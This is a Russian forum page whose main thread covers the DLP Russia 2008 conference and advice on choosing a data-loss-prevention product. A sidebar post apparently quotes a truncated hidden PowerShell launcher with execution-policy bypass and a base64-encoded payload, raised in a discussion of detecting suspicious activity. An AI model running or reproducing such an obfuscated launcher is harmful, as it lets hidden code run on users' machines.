Перейти к содержанию
Михаил Кондрашин

DLP Russia 2008

Recommended Posts

Михаил Кондрашин

Полагаю, что отчет и обсуждения еще грядут в других ветках форума. Пока помещу фотографию

20081106_6485.JPG

post-14-1226059332_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Михаил Орешин

Подпись под фотографией: «Ильин пытается вдуть Могулу, что он работает в финансовой компании, где 1000 сотрудников и с деньгами нет напряга…» :)

Простите, не удержался :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Михаил Кондрашин
Подпись под фотографией: «Ильин пытается вдуть Могулу, что он работает в финансовой компании, где 1000 сотрудников и с деньгами нет напряга…» :)

Простите, не удержался :)

А я все фотографирую и не слышу о чем говорят докладчики. Мне важнее, чтобы портретируемый не моргнул. :)

Так о чем был вопрос и какой был ответ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Deja_Vu

Beautiful photo -))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Михаил Орешин
Так о чем был вопрос и какой был ответ?

Пусть Ильин и рассказывает. ;)

Сережа задал "наивный" вопрос, а собственно что выбрать, какого вендора ?

Карпенко отвечал долго, но суть свелась к тому что вендоров много, берите у каждого на тестирование продукт на полгода, потом разберетесь.

А Могул тут же стал проводить квалификацию Ильина как клиента (вертикаль, количество рабочих мест, сколько денег) ну Сережа и ответил в духе, что он из Финансов, 1000 пользователей и денег много.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин
А Могул тут же стал проводить квалификацию Ильина как клиента (вертикаль, количество рабочих мест, сколько денег) ну Сережа и ответил в духе, что он из Финансов, 1000 пользователей и денег много.

Собственно вопрос был о том, как выбрать подходящее DLP-решение. На какие факторы стоит обратить внимание при выборе? Вопрос самый что ни на есть прикладной. Продуктов много, что выбрать? :)

Дмитрий Карпенко посоветовал ставить все и тестировать в боевых условиях, при случае прогибая поставщиков на длительный пробные внедрения (оптимально месяца по 3). Рич Могут подошел к делу как настоящий аналитик, на что я и рассчитывал. Он решил проинтервьюировать меня и на практике показать, как надо выбирать продукт.

Суть его вопросов свилась к необходимости узнать следующее:

1. Размер компании

2. Отрасль

3. Работаем ли мы с персональной информацией

4. На каких стадиях хотим защищать информацию (data in motion, in rest, in use)

5. Какой бюджет

Собственно это и есть критерии выбора DLP-решения, т.е. ответ на свой вопрос я получил. Ну пришлось создать для Рича вымышленную успешную финансовую корпорацию на 1000 пользователей, работающую с персональными данными и желающую контролировать/защищать информацию во всех стадиях ;)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Михаил Кондрашин
Beautiful photo -))

Please folow the link below to see even more beautiful photos of DLP Russia 2008 conference.

URL: http://picasaweb.google.com/mkondrashin/DLP08#

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×